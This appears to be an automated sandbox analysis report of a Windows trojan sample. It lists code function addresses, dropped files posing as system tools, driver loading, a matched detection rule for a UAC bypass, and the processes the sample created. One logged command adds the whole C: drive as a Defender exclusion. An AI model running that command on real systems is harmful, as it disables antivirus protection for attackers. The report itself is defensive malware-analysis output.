Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00905398
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0091E39C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009B538A
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A143B5
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009FE3D5
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0099F314
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009CA32A
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0093A358
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1F377
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008D94A4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009384BC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009D34AD
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009C04AC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009CF4FA
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0091E4F8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009A14F1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008EB4FC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1D4DD
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C1400
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0090F458
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A3747D
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009D047E
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A3544E
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009335B0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009D55BB
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009E55AE
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009E65AD
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A355E2
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A2C5C7
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009D65FB
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009045E0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008E35F4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009F752C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0099C548
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00908570
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A3E544
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009246B4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009A96B1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009326A0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0093C6A0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009E16FA
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A2E6CB8_2_00A2E6CB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009AF6ED8_2_009AF6ED
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009F86E48_2_009F86E4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009F66068_2_009F6606
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009AB6288_2_009AB628
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A3A6768_2_00A3A676
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009A966A8_2_009A966A
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0091178C8_2_0091178C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009127B48_2_009127B4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0099E7138_2_0099E713
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F876C8_2_008F876C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009BB8DE8_2_009BB8DE
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009DC8DB8_2_009DC8DB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E68C48_2_008E68C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C18EC8_2_008C18EC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092D80C8_2_0092D80C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009278348_2_00927834
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009328208_2_00932820
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092284C8_2_0092284C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009398708_2_00939870
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009368788_2_00936878
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008EF8708_2_008EF870
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009339848_2_00933984
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A089CB8_2_00A089CB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009A19188_2_009A1918
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009CD90D8_2_009CD90D
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E79188_2_008E7918
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009019408_2_00901940
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A09AAB8_2_00A09AAB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00903AB08_2_00903AB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F6ABC8_2_008F6ABC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008D5AB08_2_008D5AB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00930AF48_2_00930AF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00901AF88_2_00901AF8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009A2AEB8_2_009A2AEB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009B1A118_2_009B1A11
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00927A508_2_00927A50
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00935A588_2_00935A58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A0BA768_2_00A0BA76
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009B9A448_2_009B9A44
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00931A748_2_00931A74
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F8A648_2_008F8A64
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008CBA608_2_008CBA60
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009B2B918_2_009B2B91
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0099FBB08_2_0099FBB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009D5BB78_2_009D5BB7
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009FFBB38_2_009FFBB3
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009B3BF18_2_009B3BF1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C9BF48_2_008C9BF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0093DB308_2_0093DB30
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009C9B2E8_2_009C9B2E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009CFB5C8_2_009CFB5C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00927CB88_2_00927CB8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00938CBC8_2_00938CBC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092DCAC8_2_0092DCAC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00912CC88_2_00912CC8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00911CF08_2_00911CF0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A25CDB8_2_00A25CDB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0091AC088_2_0091AC08
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A24C3C8_2_00A24C3C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009F4C588_2_009F4C58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00928C788_2_00928C78
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008CED888_2_008CED88
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F5D848_2_008F5D84
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00937D808_2_00937D80
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A3DDBB8_2_00A3DDBB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A14D8E8_2_00A14D8E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009D7D018_2_009D7D01
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00A37D0B8_2_00A37D0B
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009DCD5D8_2_009DCD5D
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009ADD7E8_2_009ADD7E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C4E808_2_008C4E80
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008F2EAC8_2_008F2EAC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009CBED08_2_009CBED0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00922EDC8_2_00922EDC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009F1ECB8_2_009F1ECB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009F7EC78_2_009F7EC7
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009E6EC48_2_009E6EC4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092CEF48_2_0092CEF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C8EE48_2_008C8EE4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009FDE1F8_2_009FDE1F
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009C0E668_2_009C0E66
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0093CF9C8_2_0093CF9C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009E7FDD8_2_009E7FDD
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00939FF48_2_00939FF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008DEF088_2_008DEF08
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009B0F3C8_2_009B0F3C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008D6F588_2_008D6F58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E1F508_2_008E1F50
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009CCF658_2_009CCF65
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014000116411_2_0000000140001164
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014005EFEC11_2_000000014005EFEC
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014001D02011_2_000000014001D020
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400638E411_2_00000001400638E4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014001292411_2_0000000140012924
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014006016411_2_0000000140060164
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400021BC11_2_00000001400021BC
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014000C20C11_2_000000014000C20C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_0000000140021C5811_2_0000000140021C58
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400614CC11_2_00000001400614CC
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400054E411_2_00000001400054E4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014001565C11_2_000000014001565C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_000000014006577C11_2_000000014006577C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_0000000140061FDC11_2_0000000140061FDC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B3500AD12_2_00007FF88B3500AD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B3600AD14_2_00007FF88B3600AD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B36194514_2_00007FF88B361945
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B432E1114_2_00007FF88B432E11
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe 4F0B2C61BCCFD9AA3DB301EE4E15607DF41DED533757DE34C986A0FF25B6246D
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\bS4Vs_8188.sys C37BF1ABC0662B4F18607E2D7B75F5C600E45EA5604DAFFA54674E2AEBDCE9F0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process token adjusted: Load Driver
Source: C:\Windows\System32\svchost.exe | Code function: String function: 000001C3DDDC84A8 appears 48 times
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: String function: 008DB600 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: String function: 0000000140011D54 appears 40 times
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000000.1313942283.0000000000681000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamenslookup.exej% vs SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Binary or memory string: OriginalFilenamenslookup.exej% vs SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\N4nguGs_8188
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Static PE information: Section: t2 ZLIB complexity 0.9930853074596774
Source: bS4Vs_8188.sys.8.dr | Binary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@22/19@2/6
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0041DE90 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Mutant created: \Sessions\1\BaseNamedObjects\{3FA0BA37-09C6-4551-AE7D-90F1279DF03F}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Mutant created: \Sessions\1\BaseNamedObjects\{332F5D59-2BCB-4D58-B258-019647CFE541}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Mutant created: \Sessions\1\BaseNamedObjects\{3309A6B4-2F09-4BC8-A971-5D5A3B1B34EE}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BECD724E-BB45-47CB-82D8-31731BA1EB16}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\{213CD3BF-7EA5-4F3F-A371-F1D075B5EB25}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}
Source: C:\Windows\System32\svchost.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Virustotal: Detection: 64%
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | ReversingLabs: Detection: 80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\svchost.exe | Process created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
